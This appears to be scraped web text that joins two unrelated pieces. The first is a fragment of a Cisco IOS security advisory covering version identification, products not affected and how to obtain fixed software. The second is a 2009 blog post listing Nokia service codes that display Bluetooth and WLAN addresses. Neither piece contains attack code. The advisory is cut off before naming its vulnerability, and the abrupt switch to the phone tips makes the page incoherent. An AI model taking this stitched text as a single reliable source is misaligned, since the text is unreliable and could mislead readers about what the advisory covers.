Compiled Mon 17-Mar-08 14:39 by dchih
The following example identifies a Cisco product that is running Cisco IOS Software Release 12.4(20)T with an installed image name of C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
The following Cisco products are confirmed not vulnerable:
- Cisco IOS Software not explicitly mentioned in this Advisory
- Cisco IOS XR Software
- Cisco NX-OS Software
No other Cisco products are currently known to be affected by this vulnerability.
Obtaining Fixed Software
Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco’s software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.
Nokia Smartphone Tricks
by Rootadmin on Jul.26, 2009, under Uncategorized
So your phone's got WiFi and Bluetooth; need to know the Bluetooth device address or your WLAN MAC address?
*#2820# (*#BTA0#) – This will display the Bluetooth device address for your Nokia
*#62209526# (*#MAC0WLAN) – This will show you the MAC address of the WLAN adapter on your nokia